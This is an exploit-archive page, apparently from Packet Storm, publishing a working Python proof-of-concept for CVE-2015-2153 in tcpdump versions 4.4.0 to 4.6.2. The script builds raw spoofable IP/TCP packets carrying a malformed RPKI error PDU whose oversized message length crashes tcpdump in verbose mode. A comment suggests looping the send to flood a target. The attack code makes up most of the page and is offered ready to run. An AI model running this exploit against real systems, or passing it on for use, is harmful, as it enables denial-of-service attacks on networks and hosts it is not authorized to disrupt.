exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tcpdump rpki_rtr_pdu_print Out-Of-Bounds Denial Of Service

tcpdump rpki_rtr_pdu_print Out-Of-Bounds Denial Of Service
Posted Jul 21, 2015
Authored by Luke Arntson

tcpdump suffers from a rpki_rtr_pdu_print denial of service vulnerability. Versions affected include 4.6.2, 4.5.1, and 4.4.0.

tags | exploit, denial of service
advisories | CVE-2015-2153
SHA-256 | 76f3283d0ab1af6950691a1d53179bcf5061e40fa7a181aa998c1ee2900c4473

tcpdump rpki_rtr_pdu_print Out-Of-Bounds Denial Of Service

Change Mirror Download
# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service
# Date: 7.18.2015
# Exploit Author: Luke Arntson arntsonl@gmail.com
# Vendor Homepage: http://www.tcpdump.org/
# Software Link: http://www.tcpdump.org/
# Version: 4.6.2, 4.5.1, 4.4.0
# Tested on: Lubuntu 14.04 64-bit
# CVE : CVE-2015-2153

# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.

import socket, sys
from struct import *

def checksum(msg):
s = 0
for i in range(0, len(msg), 2):
w = ord(msg[i]) + (ord(msg[i+1]) << 8 )
s = s + w
s = (s>>16) + (s & 0xffff);
s = s + (s >> 16);
s = ~s & 0xffff
return s

if len(sys.argv) != 3:
print "Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>"
exit()

# fake the source and destination
source_ip = sys.argv[1]
dest_ip = sys.argv[2]

try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error , msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()

packet = ''

# ip header fields
ip_ihl = 5
ip_ver = 4
ip_tos = 0
ip_tot_len = 0 # kernel will fill the correct total length
ip_id = 54321 #Id of this packet
ip_frag_off = 0
ip_ttl = 255
ip_proto = socket.IPPROTO_TCP
ip_check = 0 # kernel will fill the correct checksum
ip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to
ip_daddr = socket.inet_aton ( dest_ip )

ip_ihl_ver = (ip_ver << 4) + ip_ihl

ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)

# tcp header fields
tcp_source = 255 # source port
tcp_dest = 323 # destination port
tcp_seq = 454
tcp_ack_seq = 0
tcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
tcp_fin = 0
tcp_syn = 1
tcp_rst = 0
tcp_psh = 0
tcp_ack = 0
tcp_urg = 0
tcp_window = socket.htons (5840) # maximum allowed window size
tcp_check = 0
tcp_urg_ptr = 0

tcp_offset_res = (tcp_doff << 4) + 0
tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)

tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)

# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.
# The RPKI pdu looks like the following
# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]
# by giving message length a long value, we cause the buffer to write into bad memory
error_pdu = '\x41' # fake version
error_pdu = error_pdu + '\x0A' # error type
error_pdu = error_pdu + '\x00\x01' # error number
error_pdu = error_pdu + '\x00\x00\x00\x08' # must be less than or equal to total packet length
error_pdu = error_pdu + '\x00\x00\x00\x00' # no encapsulated pdu
error_pdu = error_pdu + '\x7F\xFF\xFF\xFF' # overwrite out-of-bounds '\0', causing DoS
error_pdu = error_pdu + 'AAAA' # fake message

user_data = error_pdu

# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header) + len(user_data)

psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header + user_data;

tcp_check = checksum(psh)

# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order
tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)

# final full packet - syn packets dont have any data
packet = ip_header + tcp_header + user_data

#Send the packet finally - the port specified has no effect
s.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target


Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close